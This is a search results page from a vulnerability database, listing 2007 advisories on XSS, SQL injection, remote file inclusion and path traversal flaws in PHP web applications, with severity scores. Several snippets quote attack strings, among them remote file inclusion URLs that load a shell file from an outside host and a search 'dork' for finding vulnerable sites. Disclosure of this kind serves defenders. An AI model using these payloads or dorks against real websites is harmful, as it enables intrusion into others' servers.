Lucene search
K

7210 matches found

Cvelist
Cvelist
added 2007/08/08 1:11 a.m.16 views

CVE-2007-4178

Cross-site scripting XSS vulnerability in index.php in WebDirector 2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the deslocal parameter...

5.7AI score0.01545EPSS
Exploits1References5
securityvulns
securityvulns
added 2007/08/08 12:0 a.m.51 views

VietPHP Remote File Inclusion Vulnerbility

VietPHP Remote File Inclusion Vulnerbility Vuln. code : in: admin/index.php /index.php /functions DoRk: Powered by VietPHP Exploit: www.server.com/path/admin/index.php?language=Sh3LL www.server.com/index.php??language=Sh3LL www.server.com/functions.php?dirpath=Sh3LL...

2.8AI score
Exploits0
Packet Storm
Packet Storm
added 2007/08/08 12:0 a.m.32 views

vietphp-rfi.txt

VietPHP Remote File Inclusion Vulnerbility Vuln. code : in: admin/index.php /index.php /functions DoRk: Powered by VietPHP Exploit: www.server.com/path/admin/index.php?language=Sh3LL www.server.com/index.php??language=Sh3LL www.server.com/functions.php?dirpath=Sh3LL...

7.4AI score
Exploits0
Patchstack
Patchstack
added 2007/08/07 12:0 a.m.57 views

WordPress Blue Memories Plugin <= 1.5 - XSS

Because of this vulnerability in index.php, the attackers can inject arbitrary web script or HTML via the "s" parameter. Solution Update the theme...

4.3CVSS3AI score0.02874EPSS
Exploits0References1Affected Software1
Positive Technologies
Positive Technologies
added 2007/08/07 12:0 a.m.5 views

PT-2007-5361 · Xuyiyang · Blue Memories Theme

Cross-site scripting XSS vulnerability in index.php in the Blue Memories theme 1.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter, possibly a related issue to CVE-2007-2757 and CVE-2007-4014. NOTE: the provenance of this information is unknown; th...

6.8CVSS5.6AI score0.04897EPSS
Exploits0References6
NVD
NVD
added 2007/08/03 9:17 p.m.21 views

CVE-2007-4156

Multiple SQL injection vulnerabilities in wolioCMS allow remote attackers to execute arbitrary SQL commands via 1 the id parameter to member.php in a page action, related to a SELECT statement in common.php; and the 2 loginid parameter uid variable, and possibly the 3 pwd parameter, to...

7.5CVSS8.6AI score0.01264EPSS
Exploits0References7
Prion
Prion
added 2007/08/03 9:17 p.m.16 views

Sql injection

Multiple SQL injection vulnerabilities in wolioCMS allow remote attackers to execute arbitrary SQL commands via 1 the id parameter to member.php in a page action, related to a SELECT statement in common.php; and the 2 loginid parameter uid variable, and possibly the 3 pwd parameter, to...

7.5CVSS9.3AI score0.01264EPSS
Exploits0References7
Cvelist
Cvelist
added 2007/08/03 9:0 p.m.22 views

CVE-2007-4156

Multiple SQL injection vulnerabilities in wolioCMS allow remote attackers to execute arbitrary SQL commands via 1 the id parameter to member.php in a page action, related to a SELECT statement in common.php; and the 2 loginid parameter uid variable, and possibly the 3 pwd parameter, to...

8.6AI score0.01264EPSS
Exploits0References7
NVD
NVD
added 2007/08/03 10:17 a.m.17 views

CVE-2007-4141

OpenRat CMS 0.8-beta1 and earlier allows remote attackers to obtain sensitive information via a request containing an XSS sequence in the action parameter to index.php, which reveals the path in an error message...

4.3CVSS5.7AI score0.01022EPSS
Exploits0References3
CVE
CVE
added 2007/08/01 4:0 p.m.39 views

CVE-2007-4117

Affected software: phpWebFileManager 0.5. The issue is described as a PHP remote file inclusion vulnerability in index.php via the PN_PathPrefix parameter, allowing remote code execution. The underlying cause is the handling of PN_PathPrefix in the index.php file, with the note that a reliable th...

6.8CVSS7.5AI score0.01349EPSS
Exploits0References4Affected Software1
Positive Technologies
Positive Technologies
added 2007/08/01 12:0 a.m.4 views

PT-2007-5319 · Php · Phpwebfilemanager

Name of the Vulnerable Software and Affected Versions: phpWebFileManager version 0.5 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the PN PathPrefix parameter in the index.php file. However, this issue is disputed by a reliable third party, who...

6.8CVSS7.9AI score0.01349EPSS
Exploits0References6
Packet Storm
Packet Storm
added 2007/07/31 12:0 a.m.28 views

woliocms-sql.txt

wolioCMS - SQL Injection and Bypass Administrator Login Vendor : http://www.buton.web.id/member.php?member=anon Download : http://www.buton.web.id/download/woliocms.zip Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg @irc.dal.net Exploit ini berhasil jika...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2007/07/31 12:0 a.m.34 views

Madoa Poll v1.1 Remote File Include Vulnerabilities

Madoa Poll v1.1 Remote File Include Vulnerabilities ilker kandemir ilkerkandemiratmynet.com info: / Her$ey Vatan icin / Download: http://www.finnermark.se/madoa/Madoapoll11.zip TnX.: Ajann, Dumenci, H0tTurk, Str0ke Bug: require $Madoa . "config.php"; Exploit: index.php?Madoa=http://sheel.txt?...

1.4AI score
Exploits0
Prion
Prion
added 2007/07/30 5:30 p.m.19 views

Design/Logic Flaw

Webbler CMS before 3.1.6 provides the full installation path within HTML comments in certain documents, which allows remote attackers to obtain sensitive information by viewing the HTML source, as demonstrated by viewing the source generated from index.php...

5CVSS6.5AI score0.01218EPSS
Exploits0References4Affected Software1
Prion
Prion
added 2007/07/30 5:30 p.m.10 views

Sql injection

Multiple SQL injection vulnerabilities in AlstraSoft Affiliate Network Pro allow remote attackers to execute arbitrary SQL commands via 1 the pgmid parameter in an uploadProducts action to merchants/index.php and possibly 2 the rowid parameter to merchants/temp.php...

7.5CVSS9.3AI score0.00994EPSS
Exploits1References4Affected Software1
NVD
NVD
added 2007/07/27 10:30 p.m.19 views

CVE-2007-4046

SQL injection vulnerability in index.php in the Pony Gallery componygallery 1.5 and earlier component for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter...

7.5CVSS8.4AI score0.02167EPSS
Exploits2References5
CVE
CVE
added 2007/07/27 10:0 p.m.62 views

CVE-2007-4046

CVE-2007-4046 is a SQL injection vulnerability in the Pony Gallery (com_ponygallery) for Joomla! 1.5 and earlier, exploitable via the catid parameter in index.php. Remote attackers could execute arbitrary SQL commands. Documents confirm affected software and an exploit/disclosure trail (e.g., exp...

7.5CVSS8.4AI score0.02167EPSS
Exploits2References5Affected Software1
CVE
CVE
added 2007/07/26 7:0 p.m.42 views

CVE-2007-4028

CVE-2007-4028 affects Webspell 4.01.02. A vulnerability in index.php allows absolute path traversal, enabling remote attackers to include and execute arbitrary local files via a full pathname in the site parameter. CVSS v2 base score 7.5 (HIGH): Network vector, no authentication, low attack compl...

7.5CVSS7.1AI score0.01523EPSS
Exploits1References5Affected Software1
Cvelist
Cvelist
added 2007/07/26 7:0 p.m.23 views

CVE-2007-4028

Absolute path traversal vulnerability in index.php in Webspell 4.01.02 allows remote attackers to include and execute arbitrary local files via a full pathname in the site parameter. NOTE: some of these details are obtained from third party information...

7AI score0.01523EPSS
Exploits1References5
Prion
Prion
added 2007/07/25 5:30 p.m.11 views

Sql injection

SQL injection vulnerability in index.php in bwired allows remote attackers to execute arbitrary SQL commands via the newsID parameter...

7.5CVSS9.1AI score0.01029EPSS
Exploits0References4
Rows per page
Query Builder